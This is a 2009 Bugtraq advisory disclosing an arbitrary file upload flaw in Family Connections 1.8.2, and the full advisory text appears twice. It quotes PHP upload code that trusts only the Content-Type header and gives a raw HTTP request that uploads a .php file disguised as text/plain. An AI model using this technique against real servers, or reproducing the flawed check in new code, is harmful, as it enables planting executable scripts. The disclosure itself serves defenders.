Family Connections 1.8.2 Arbitrary File Upload
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: Family Connections 1.8.2 Arbitrary File Upload
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Fri, 3 Apr 2009 18:07:51 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=Ib1RINRRSQl9wNq2Uokh36eEkInbaPgq5sD1fuTgAFg=; b=gMxqVUYEM1qHc70qkMwyzUr86WjWfwxYOXAgxM1GMzAidkqM/2N8ba+I6kOmM7DykZ jokv/aPCEG2I8GITmasDCB5qRil58sO1QXUCweFStHDiBV7kP1+5qEpqz+zKZ/7n5iWg 1l9zi2GL2HcXgxIZcuu+FCyE1bOsmzS2imOoc=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=rjMp4h4n3J9t/IO0tcR+VHBoR2dza9bQjkKELxOB/zJr962oln0dj1TLpDlqiTzviN uZb9zAbiH3fkvJ5ZtkD/bQOrRs8OvhKnhJ/LZzVOh+XGS3Te9xJK44XX+apqZ/jDFMz3 +tdwMf2d7M758r/oYY34bHQdQbXJ46D1XqfX0=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******* Salvatore "drosophila" Fresta *******
[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 3 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Arbitrary File Upload
[-] Files affected: documents.php inc/documents_class.php
This bug allows a registered user to upload arbitrary
files on the system. This is possible because there
aren't controls on file extension but on the
Content-Type header only, that can be changed easily.
...
if (isset($_POST['submitadd'])) {
$doc = $_FILES['doc']['name'];
$desc = addslashes($_POST['desc']);
if
($docs->uploadDocument($_FILES['doc']['type'],
$_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) {
...
function uploadDocument ($filetype, $filename, $filetmpname) {
global $LANG;
$known_photo_types = array('application/msword' => 'doc',
'text/plain' => 'txt', 'application/excel' => 'xsl',
'application/vnd.ms-excel' => 'xsl', 'application/x-msexcel' => 'xsl',
'application/x-compressed' => 'zip',
'application/x-zip-compressed'
=> 'zip', 'application/zip' => 'zip', 'multipart/x-zip' => 'zip',
'application/rtf' => 'rtf',
'application/x-rtf' => 'rtf', 'text/richtext' => 'rtf',
'application/mspowerpoint' => 'ppt', 'application/powerpoint' =>
'ppt', 'application/vnd.ms-powerpoint' => 'ppt',
'application/x-mspowerpoint' => 'ppt',
'application/x-excel' =>
'xsl', 'application/pdf' => 'pdf');
if (!array_key_exists($filetype, $known_photo_types)) {
echo "<p
class=\"error-alert\">".$LANG['err_not_doc1']." $filetype
".$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>";
return false;
} else {
copy($filetmpname, "gallery/documents/$filename");
return true;
}
}
...
*************************************************
[+] Code
- [A] Arbitrary File Upload
The following is an example of a malicious package:
POST /fcms/upload.php HTTP/1.1\r\n
Host: localhost\r\n
Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n
Content-type: multipart/form-data, boundary=AaB03x\r\n
Content-Length: 295\r\n\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="doc"; filename="file.php"\r\n
Content-Type: text/plain\r\n
\r\n
<?php echo "This is not a text file"?>\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="desc"\r\n
\r\n
description\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="submitadd"\r\n
\r\n
Submit\r\n
--AaB03x--\r\n
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
******* Salvatore "drosophila" Fresta *******
[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 3 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Arbitrary File Upload
[-] Files affected: documents.php inc/documents_class.php
This bug allows a registered user to upload arbitrary
files on the system. This is possible because there
aren't controls on file extension but on the
Content-Type header only, that can be changed easily.
...
if (isset($_POST['submitadd'])) {
$doc = $_FILES['doc']['name'];
$desc = addslashes($_POST['desc']);
if
($docs->uploadDocument($_FILES['doc']['type'], $_FILES['doc']['name'],
$_FILES['doc']['tmp_name'])) {
...
function uploadDocument ($filetype, $filename, $filetmpname) {
global $LANG;
$known_photo_types = array('application/msword' => 'doc',
'text/plain' => 'txt', 'application/excel' => 'xsl', 'application/vnd.ms-excel'
=> 'xsl', 'application/x-msexcel' => 'xsl',
'application/x-compressed' => 'zip',
'application/x-zip-compressed' => 'zip', 'application/zip' => 'zip',
'multipart/x-zip' => 'zip', 'application/rtf' => 'rtf',
'application/x-rtf' => 'rtf', 'text/richtext' => 'rtf',
'application/mspowerpoint' => 'ppt', 'application/powerpoint' => 'ppt',
'application/vnd.ms-powerpoint' => 'ppt',
'application/x-mspowerpoint' => 'ppt',
'application/x-excel' => 'xsl', 'application/pdf' => 'pdf');
if (!array_key_exists($filetype, $known_photo_types)) {
echo "<p
class=\"error-alert\">".$LANG['err_not_doc1']." $filetype
".$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>";
return false;
} else {
copy($filetmpname, "gallery/documents/$filename");
return true;
}
}
...
*************************************************
[+] Code
- [A] Arbitrary File Upload
The following is an example of a malicious package:
POST /fcms/upload.php HTTP/1.1\r\n
Host: localhost\r\n
Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n
Content-type: multipart/form-data, boundary=AaB03x\r\n
Content-Length: 295\r\n\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="doc"; filename="file.php"\r\n
Content-Type: text/plain\r\n
\r\n
<?php echo "This is not a text file"?>\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="desc"\r\n
\r\n
description\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="submitadd"\r\n
\r\n
Submit\r\n
--AaB03x--\r\n
*************************************************
[+] Fix
No fix.
*************************************************